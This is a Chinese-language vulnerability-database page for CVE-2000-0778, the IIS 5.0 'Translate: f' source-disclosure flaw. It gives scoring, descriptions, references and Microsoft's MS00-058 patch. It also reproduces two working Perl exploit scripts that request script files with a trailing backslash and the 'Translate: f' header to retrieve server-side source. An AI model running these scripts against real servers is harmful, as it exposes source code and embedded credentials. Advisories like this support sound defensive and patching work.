CVE-2000-0778
CVSS5.0
发布时间 :2000-10-20 00:00:00
修订时间 :2013-08-03 00:14:09
NMCOE    

[原文]IIS 5.0 allows remote attackers to obtain source code for .ASP files and other scripts via an HTTP GET request with a "Translate: f" header, aka the "Specialized Header" vulnerability.


[CNNVD]Microsoft IIS 5.0 "Translate: f"头标记导致源码泄露漏洞(MS00-058)(CNNVD-200010-019)

        
        IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。
        IIS 5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。
        如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:927IIS5.0 Specialized Header Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0778
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0778
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-019
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=080D5336D882D211B56B0060080F2CD696A7C9@beta.mia.cz
(VENDOR_ADVISORY)  BUGTRAQ  20000815 Translate:f summary, history and thoughts
http://www.securityfocus.com/bid/1578
(VENDOR_ADVISORY)  BID  1578
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0008&L=ntbugtraq&F=&S=&P=5212
(VENDOR_ADVISORY)  NTBUGTRAQ  20000816 Translate: f
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
(UNKNOWN)  MS  MS00-058

- 漏洞信息

Microsoft IIS 5.0 "Translate: f"头标记导致源码泄露漏洞(MS00-058)
中危 未知
2000-10-20 00:00:00 2005-10-12 00:00:00
远程  
        
        IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。
        IIS 5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。
        如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS00-058)以及相应补丁:
        MS00-058:Patch Available for "Specialized Header" Vulnerability
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

        补丁下载:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769

- 漏洞信息 (20151)

Microsoft IIS 5.0 "Translate: f" Source Disclosure Vulnerability (1) (EDBID:20151)
windows remote
2000-08-14 Verified
0 smiler
N/A [点击下载]
source: http://www.securityfocus.com/bid/1578/info

Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server.

It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 =
using a shared drive but I haven=B4t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in =
BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it=B4s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl =
http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=3D$ARGV[0];

         # Create a user agent object
         use LWP::UserAgent;
         $ua =3D new LWP::UserAgent;

        # Create a request
        my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
        $req->content_type('application/x-www-form-urlencoded');
        $req->content_type('text/html');
        $req->header(Translate =3D> 'f'); # Here is the famous translate =
header :))
        $req->content('match=3Dwww&errors=3D0');

         # Pass request to the user agent and get a response back
         my $res =3D $ua->request($req);

         # Check the outcome of the response
         if ($res->is_success) {
             print $res->content;
         } else {
             print $res->error_as_HTML;
         }
		

- 漏洞信息 (20152)

Microsoft IIS 5.0 "Translate: f" Source Disclosure Vulnerability (2) (EDBID:20152)
windows remote
2000-08-14 Verified
0 Roelof Temmingh
N/A [点击下载]
source: http://www.securityfocus.com/bid/1578/info
 
Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server.
 
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.


#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
		

- 漏洞信息

390
Microsoft IIS Translate f: Request ASP Source Disclosure
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified, Third-party Verified, Coordinated Disclosure

- 漏洞描述

Microsoft IIS contains a flaw that may allow a remote attacker to view the source code of ASP/ASA scripts. The issue is due to the server not properly handling the "Translate: f" header, used by WebDAV and FrontPage2000. With a specially crafted header, an attacker can force the server to display script source code instead of processing the script normally. This may reveal sensitive information such as internal IP addresses, account names or passwords.

- 时间线

2000-08-15 Unknow
2000-08-16 2000-08-14

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (MS00-058) to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站